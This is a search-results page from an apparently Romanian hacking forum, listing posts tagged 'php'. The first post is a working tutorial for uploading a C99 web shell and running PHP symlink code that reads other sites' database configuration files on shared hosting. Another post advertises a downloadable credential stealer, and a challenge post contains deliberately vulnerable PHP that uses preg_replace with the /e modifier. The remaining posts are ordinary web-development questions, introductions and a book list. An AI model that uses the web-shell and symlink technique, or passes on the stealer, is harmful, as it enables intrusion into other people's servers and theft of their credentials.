Jump to content

Search the Community

Showing results for tags 'php'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Mai întâi de toate vom folosi func?ia symlink pentru a face o comand? rapid? pentru orice fi?ier sau folder vrem de aceea aceast? func?ie v? va fi foarte util? pentru citirea oric?rui folder sau fi?ier (Pentru mai multe detalii Utiliza?i Google). Aici am folosit Shell Named "C99" pentru a executa micul cod php (Eval Code) pe serverul de shared hosting. Exploit-ul este folosit pentru a desc?rca baza de date a victimei dac? ?i numai dac? victima este într-un host comun Desc?rca?i Shell-ul "C99 Shell" ?i urma?i pa?i. Ob?ine?i Oricare Shell C99 /Pasul 1 $ Incarc? php i.e Shell_R-H.php Shell root path (cale). Care este /home/hackerz/public_html . /Pasul 2 $ Deschide?i fi?ierul înc?rcat. http://www.yoursitename.com/shell_R-H.php /Pasul 3 $ Urm?torul pas este s? citi?i cu aten?ie mai jos php Eval Code. Este vorba despre 10 linii php code !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $filepath='/home/xx/public_html/xx.xx'; $sitepath='/home/xx/public_html/'; $writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath; @unlink($flib); symlink($filepath, $flib); echo readlink($flib) . "\n"; echo "<textarea cols=30 rows=10>".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>"; @unlink($flib); !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! /Pasul 4 Înlocuirea (xx) pe urma (xx.xx) - (fi?ier-ul ?int?, utilizat de obicei pentru a citi fi?ierele bazei de date de configurare unde g?sim informa?ii de conectare.) EX: - "/home/fbi/public_html/configuration.php" $writeblefilepath, acceseaz? în toate c?ile de scriere asupra site-ului. ?i, de asemenea, este utilizat pentru a face procesul - leg?tura.. scriere ?i ie?ire. Pentru @unlink îl pute?i c?uta pe php.net Este cam vechi in arhiva mea dar merge
  2. Ofer: - Servicii de dezvoltare web in urmatoarele medii: PHP, HTML, CSS, Javascript si MySQL. - Bot scripting (crawlere, automatizari operatiuni, interactiuni cu diferite sisteme) Va pot garanta calitate si profesionalism, la preturi accesibile. Daca sunteti interesat, lasati un PM cu datele de contact.
  3. Salut! Cum se face un formular cu mai multe variante? De exemplu daca ai o intrebare cu 3 optinui de raspuns care sunt butoane radio.. cand dai click pe un buton radio sa-ti apara restul de formular (fara refresh, fara submit) *pentru fiecare optiune (buton radio) trebuie sa apara alt formular. Multumesc!
  4. A mixed bag: new and old/ attack and defense/ for developers, managers, testers/ PHP, AJAX, Rails, Java, .NET, Oracle etc. Ajax Security [2007] Apache Security [2005] Applied Oracle Security: Developing Secure Database and Middleware Environments [2009] BackTrack 4: Assuring Security by Penetration Testing [2011] Beginning ASP.NET Security [2010] Core Security Patterns: Best Practices and Strategies for J2EE, Web Services, and Identity Management [2005] Cracking Drupal: A Drop in the Bucket [2009] Developer's Guide to Web Application Security [2007] E-Commerce: A Control and Security Guide [2004] Enterprise Web Services Security [2005] Essential PHP Security [2005] Expert Web Services Security in the .NET Platform [2004] request download ticket | ifile.it --- Google Hacking for Penetration Testers [2005] Google Hacking for Penetration Testers, Volume 2 [2007] Hacker Web Exploitation Uncovered [2005] Hacking Exposed Web 2.0 [2007] Hacking Exposed Web Applications, 3rd Edition [2011] HackNotes Web Security Pocket Reference [2003] Hack Proofing ColdFusion [2002] Hack Proofing Your E-Commerce Site [2001] Hack Proofing Your Web Applications [2001] How to Break Web Software: Functional and Security Testing of Web Applications and Web Services [2006] Implementing Database Security and Auditing: Includes Examples for Oracle, SQL Server, DB2 UDB, Sybase [2005] Joomla! Web Security [2008] Mastering Web Services Security [2003] ModSecurity 2.5 [2009] ModSecurity Handbook [2010] Oracle Security [1998] php architect's Guide to PHP Security [2005] Practical Oracle Security: Your Unauthorized Guide to Relational Database Security [2007] request download ticket | ifile.it --- Preventing Web Attacks with Apache [2006] Pro PHP Security: From Application Security Principles to the Implementation of XSS Defenses, Second Edition [2010] Secure E-Government Web Services [2005] Securing PHP Web Applications [2009] Security for Web Services and Service-Oriented Architectures [2009] Security Fundamentals for E-Commerce [2002] Security on Rails [2009] Security Technologies for the World Wide Web, Second Edition [2002] Seven Deadliest Web Application Attacks [2010] SQL Injection Attacks and Defense [2009] SQL Server Security Distilled [2004] SSL & TLS Essentials: Securing the Web [2000] The Oracle Hacker's Handbook: Hacking and Defending Oracle [2007] The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws [2007] The Database Hacker's Handbook: Defending Database Servers [2005] Web 2.0 Security - Defending AJAX, RIA, AND SOA [2007] Web Application Vulnerabilities: Detect, Exploit, Prevent [2007] Web Hacking: Attacks and Defense [2002] Web Security, Privacy and Commerce, 2nd Edition [2002] Web Security Testing Cookbook: Systematic Techniques to Find Problems Fast [2008] Web Services Security [2003] XML Security [2002] XSS Exploits and Defense [2007] request download ticket | ifile.it
  5. Istealer 6.3 (modded php) Web http://img195.imageshack.us/img195/3999/istealer63mod.jpg Scan iStealer 6.3 Legends : VirusTotal - Free Online Virus, Malware and URL Scanner Download: Multiupload.com - upload your files to multiple file hosting sites!
  6. Vreau sa imi fac un site de traffic exchange, nu ma intereseaza scripturi gata facute de sute de dolari. O sa il scriu eu. Concepul: Fiecare user va avea un link si va da click pe alte linkuri de la altii useri. Cand da click primeste 1 punct. Cand altul da click pe linkul lui i se scade un punct. Problema e ca nu stiu unde sa retin toate astea (clickurile). (Nu vreau sa poata da click la un interval mai mic de 24 de ore pe un anumit link). Sa fac un tabel separat in care sa retin toate astea? Adica: "Userul 32 a dat click pe 543 la timestampul" "Userul 432 a dat click pe 54 la timestampul" Sau fac cate un tabel pentru fiecare user unde sa retin pe ce a dat click+timestamp?
  7. Felicit?ri pentru înving?tori: hari ? [11.08.2010 03:24 PM] Primul Challenge publicat de mine pe RST l-am numit ca fiind unul pu?in mai neobi?nuit, deoarece nu am v?zut ca cineva s? foloseasc? sau s? descrie acea metod?. Tot din acela?i motiv, voi publica un nou Challenge, care (sper din tot sufletul) v? va înfierbânta pu?in creiera?ii. Deci, avem un administrator de Blog, care, pentru o func?ionare corect? a micului site, folose?te urm?torul cod PHP: <?php define ( 'BASE_PATH', dirname ( __FILE__ ) ); $bad_Symbols = array( '<', '>', '\\', '"', "'", '/', '\0', '$' ); //lista simbolurilor ce reprezint? un pericol pentru securitatea Blog-ului class Process { /* Folosim aceast? func?ie pentru a saluta vizitatorul, afi?ând un mesaj implicit */ public function Welcome() { $Msg = 'Welcome to my Personal Blog!'; return $Msg; } /* Aceast? func?ie, o folosim pentru a extrage con?inutul unei pagini (salvat într-un fi?ier local). Pentru a proteja blogul de un include, din numele fi?ierului elimin?m caracterele periculoase. */ public function Open_Page( $page ) { global $bad_Symbols; $page_File = @str_replace( $bad_Symbols, '', $page ); $show_Page = BASE_PATH . "/{$page_File}.php"; if ( @file_exists( $show_Page ) ) { return @file_get_contents( $show_Page ); } return "Error 404! Page <b>{$page_File}.php</b> not found..."; } /* Cu ajutorul acestei func?ii, din comentariul l?sat de utilizator ?tergem orice caracter periculos ?i l?sam doar textul ”curat” */ public function HTML_Clean( $html_Data ) { global $bad_Symbols; $bb_Data = @preg_replace( '#(<[a-z]+.*?>)(.*?)(</[a-z]+>)#isem', '\\2', $html_Data ); $bb_Data = @str_replace( $bad_Symbols, '', $bb_Data ); return $bb_Data; } } $init = new Process(); if ( isset( $_GET['page'] ) ) { $_Template = $init->Open_Page( $_GET['page'] ); } elseif ( isset( $_POST['comment'] ) ) { $_Template = $init->HTML_Clean( $_POST['comment'] ); } else { $_Template = $init->Welcome(); } echo $_Template; ?> Cred c? explica?iile asupra acestui cod sunt de prisos. Iar voi, dup? cum v? da?i bine seama, trebuie s? g?si?i ?i s? exploata?i vulnerabilitatea din acest PHP-cod. Succes! p.s. A?tept cu ner?bdare PM-urile înving?torilor.
  8. Alex, 26 de ani, web developer si system administrator ... sunt deschis tot timpul la incercari si idei noi si inevitabil, tot timpul ocupat cu ceva :)Bine v-am gasit
  9. Salutare , Ma numesc Alin , am 14 ani , stiu HTML, PHP si incerc sa invat Pascal
  10. Salut, sunt nou pe RST si intr-ale programarii! Invat php si am ceva probleme la if-uri! This is the html: <html> <head> <title>Piese auto</title> </head> <body> <h1>Piese auto</h1> <h2>Introduceti comanda</h2> <form action="processorder.php" method=post> <table border="0"> <tr bgcolor=#cccccc> <td width="150">Piesa</td> <td>Pret</td> <td width="15">Cantitate</td> </tr> <tr> <td>Anvelope</td> <td><center>$100</center></td> <td align="center"><input type="text" name="tireqty" size="3" maxlength="3" />bucati</td> </tr> <tr> <td>Sticle de ulei</td> <td><center>$10</center></td> <td align="center"><input type="text" name="oilqty" size="3" maxlength="3" />bucati</td> </tr> <tr> <td>Bujii</td> <td><center>$4</center></td> <td align="center"><input type="text" name="sparkqty" size="3" maxlength="3" />bucati</td> </tr> <tr> <td colspan="2" align="center"><input type="submit" value="Introdu comanda" /></td> </tr> </table> </form> <h3>Valoare TVA: 19%</h3> </body> </html> And this...php file: <html> <head> <title>Piese auto - Comanda introdusa</title> </head> <body> <h1>Piese auto</h1> <h2>Comanda introdusa</h2> <?php echo'<p>Comanda procesata la '; echo date('H:i, jS F'); echo '<p>'; $tireqty = $_POST['tireqty']; $oilqty = $_POST['oilqty']; $sparkqty = $_POST['sparkqty']; $totalqty = 0; $totalqty = $tireqty + $oilqty + $sparkqty; if($totalqty == 0) { echo 'Nu ai comandat nimic<br/>'; } elseif(is_numeric($tireqty) && is_numeric($oilqty) && is_numeric($sparkqty) && is_int($tireqty) && is_int($oilqty) && is_int($sparkqty)) { echo '<p>Ai comandat urmatoarele:</p>'; if($tireqty > 0) { echo $tireqty. ' anvelope<br />'; } else { echo 'Nu ai comandat anvelope!<br />'; } if($oilqty > 0) { echo $oilqty. ' sticle de ulei<br />'; } else { echo 'Nu ai comandat ulei!<br />'; } if($oilqty > 0) { echo $sparkqty. ' bujii<br />'; } else { echo 'Nu ai comandat bujii!<br />'; } } else { echo 'Trebuie sa introduci <u>doar numere intregi</u>(ex.: 3, 6, 14)<br />'; } /* echo 'Total piese: ' .$totalqty.'<br />'; echo '<br />'; echo '<p>Obiecte comandate: </p>'; echo $tireqty. ' anvelope;<br />'; echo $oilqty. ' sticle de ulei;<br />'; echo $sparkqty. ' bujii;<br />';*/ $totalamount = 0.00; define('TIREPRICE', 100); define('OILPRICE', 10); define('SPARKPRICE', 4); $totalamount = $tireqty * TIREPRICE + $oilqty * OILPRICE + $sparkqty * SPARKPRICE; echo 'Subtotal: $' .number_format($totalamount, 2). '<br />'; echo '<br />'; $taxrate = 0.19; $totalamount = $totalamount * (1 + $taxrate); echo 'Total(TVA inclus): $' .number_format($totalamount, 2); ?> </body> </html> Tocmai ce am scapat de o eroare strasanta(Parse error: syntax error, unexpected T_ELSE in....), acum am rezolvat, dar indiferent de ce as scrie in campurile din fisierul html, scriptul php imi sare peste elseif-ul care ar trebui sa verifice is_int, is_numeric si $totalqty > 0, $oilqty > 0...., deci sare peste el si trece direct la else, in concluzie, imi afiseaza(indiferent ce as completa in forumular) "Trebuie sa introduci doar numere intregi (ex.: 3, 6, 14) si cu totalul si subtotalul... Nu stiu cum sa-l fac sa intre in bucla de la elseif(sau care e problema) ca sa verifice conditiile alea...si apoi pe cele din if-urile incluse in bucla lui elseif! Scuzele mele daca m-am explicat ambiguu! Multumesc!
×
×
  • Create New...